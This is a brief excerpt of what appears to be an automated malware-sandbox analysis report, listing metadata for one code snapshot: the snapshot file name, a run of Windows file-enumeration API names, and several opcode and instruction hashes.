                        • Snapshot File: hcaresult_0_2_1000000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                        • String ID:
                        • API String ID: 2667927680-0
                        • Opcode ID: 009adf4939ff49845aab2eb1cced55519ab9962195fcae1142cbeeda2cb9580b
                        • Instruction ID: f20483b40bea3ee0737a9acaf1eb0292df7d49f856ded2c751cc4e75c35ad191
                        • Opcode Fuzzy Hash: 009adf4939ff49845aab2eb1cced55519ab9962195fcae1142cbeeda2cb9580b
                        • Instruction Fuzzy Hash: 4D21B87AA40205A7D764F7A0EC49ED9333DE764700F404549B6CA97188EE7497C98B91